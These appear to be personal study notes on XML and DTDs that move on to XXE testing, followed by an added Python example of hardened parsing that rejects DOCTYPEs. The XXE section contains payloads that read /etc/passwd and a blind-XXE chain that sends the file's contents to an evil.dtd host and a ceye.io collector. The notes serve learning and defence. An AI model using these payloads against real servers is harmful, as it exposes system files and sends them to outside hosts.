Contents

Learn: http://www.w3school.com.cn/xml/xml_intro.asp

Simple notes:

XML

A simple example of XML:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<skate>
<people grade="four">
<name>azhu</name>
<high> three board </high>
</people>
<people grade="one">
<name>threezhi</name>
<high> three board </high>
</people>
</skate>
```

`<!-- You should avoid using attributes in XML. -->`

In XML, there are five predefined entity references:

```
&lt;    <    less than
&gt;    >    greater than
&amp;   &    ampersand
&apos;  '    apostrophe
&quot;  "    quotation mark
```

An example of loading an XML document into an XML parser:

```html
<script>
var xmlhttp, xmlDoc;
if (window.XMLHttpRequest) {
  // code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp = new XMLHttpRequest();
} else {
  // code for IE6, IE5
  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}

// synchronous GET; responseXML is the document already parsed into a DOM
xmlhttp.open("GET", "note.xml", false);
xmlhttp.send();
xmlDoc = xmlhttp.responseXML;

document.getElementById("to").innerHTML = xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue;
document.getElementById("from").innerHTML = xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue;
document.getElementById("message").innerHTML = xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue;
</script>
```

DTD

An example of a DTD in XML (the `skate` element and the `grade` attribute are declared as well, so that a validating parser accepts the document):

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE skate [
<!ELEMENT skate (people+)>
<!ELEMENT people (name, high)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT high (#PCDATA)>
<!ATTLIST people grade CDATA #REQUIRED>
]>

<skate>
<people grade="four">
<name>azhu</name>
<high> three board </high>
</people>
<people grade="one">
<name>threezhi</name>
<high> three board </high>
</people>
</skate>
```

External document type declaration:

```xml
<!DOCTYPE skate SYSTEM "file_path">
```

PCDATA means parsed character data: the parser reads the text, so tags inside it are treated as markup and entity references are expanded.

CDATA means character data: the text is not parsed, so tags inside it are not treated as markup and entity references are not expanded.

In a DTD, declaring an element and an attribute:

```xml
<!ELEMENT element_name category>
<!ELEMENT element_name (content)>
<!ELEMENT element_name (element1, element2, ...)>

<!-- Empty element: -->
<!ELEMENT element_name EMPTY>

<!-- An element that contains only text is declared with #PCDATA. -->
<!ELEMENT element_name (#PCDATA)>

<!-- Attribute: -->
<!ATTLIST element_name attribute_name type default>
<!ATTLIST payment type CDATA "check">
```

DTD - Entities:

Entity declarations:

Internal entity:

```xml
DTD:
<!ENTITY name "value">
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

XML:
<author>&writer;&copyright;</author>
```

External entity:

```xml
DTD:
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

XML:
<author>&writer;&copyright;</author>
```

Parameter entity (note the space between `%` and the entity name in the declaration):

```xml
<!ENTITY % entity_name "value">
<!ENTITY % entity_name SYSTEM "URL">
```

Try

This is an internal entity:

```xml
<?xml version="1.0" encoding="ISO-8859-1" ?>

<!DOCTYPE note [
<!ELEMENT note (name)>
<!ENTITY fuck "You">
]>
<note>
<name>&fuck;</name>
</note>
```

I don’t know why I can’t build an XML document with an external entity successfully, so I want to put it aside for now.

DIG

When a POST request body is made up of XML and its parameters can be controlled by the client, there may be an XXE vulnerability.

We can use some simple XML to test for it.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY foo "Testing">
]>

<parameter>&foo;</parameter>
```

If it returns “Testing”, we can use other payloads to get more information.

Normal XXE

```xml
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<c>&test;</c>
```

Parameter entity:

```xml
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % test SYSTEM "file:///etc/passwd">
%test;
]>
```

If the website returns nothing, there is another way to deal with this problem.

Use external entity:

XML:

```xml
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1/shell.dtd">
]>
<c>&test;</c>
```

DTD:

```xml
<!ENTITY foo SYSTEM "file:///etc/passwd">
```

Blind XXE with ceye.io:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
```

We can create a DTD to get the echoed result.

XML:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
```

DTD:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://ip.port.b182oj.ceye.io/?xml1=%payload;'>"
>%all;
```

If the XXE exists, ceye will receive a GET request.

Of course there are many ways to get important and private information. But given my ability, I want to put it down for now and learn more important things.

XML in PHP:

```php
<?php
$xml = simplexml_load_file("note.xml");
print_r($xml);
?>
```
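To show the parser side of the probe from the DIG section (the internal entity that echoes “Testing”) next to the parsing done above, here is an added example in Python; it is not code from the original post. A default ElementTree parse honours the DTD and expands the entity, while a hardened SAX parse switches off external general entities and aborts on any DOCTYPE; the two sample documents and the helper classes `_RejectDTD` and `_TextByTag` are constructed for this example.

```python
import io
import xml.etree.ElementTree as ET
import xml.sax
from xml.sax import handler

# Constructed inputs: the internal-entity probe from the post, and plain text.
PROBE_DOC = (b'<?xml version="1.0" encoding="utf-8"?>\n'
             b'<!DOCTYPE test[\n<!ENTITY foo "Testing">\n]>\n'
             b'<parameter>&foo;</parameter>')
PLAIN_DOC = b'<parameter>Testing</parameter>'

class DoctypeForbidden(ValueError):
    """Raised when an untrusted document carries a DTD of any kind."""

class _RejectDTD:
    """SAX lexical handler: abort as soon as <!DOCTYPE ...> is seen."""
    def startDTD(self, name, public_id, system_id):
        raise DoctypeForbidden(f"DOCTYPE {name!r} refused (system id {system_id!r})")
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass

class _TextByTag(handler.ContentHandler):
    def __init__(self):
        super().__init__()
        self.text, self._stack = {}, []
    def startElement(self, name, attrs):
        self._stack.append(name)
        self.text.setdefault(name, "")
    def characters(self, content):
        if self._stack:
            self.text[self._stack[-1]] += content
    def endElement(self, name):
        self._stack.pop()

def naive_parse(data: bytes) -> dict:
    # Default ElementTree parse: the DTD is honoured and &foo; expands to "Testing".
    root = ET.fromstring(data)
    return {root.tag: root.text or ""}

def parse_untrusted(data: bytes) -> dict:
    # Hardened parse: external general entities off, and any DOCTYPE aborts.
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    parser.setProperty(handler.property_lexical_handler, _RejectDTD())
    collector = _TextByTag()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return collector.text
```

A server that answers the probe with “Testing” is behaving like `naive_parse`; rejecting the DOCTYPE up front, as `parse_untrusted` does, stops every variant in this post at the declaration stage, before any entity is resolved.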

Reference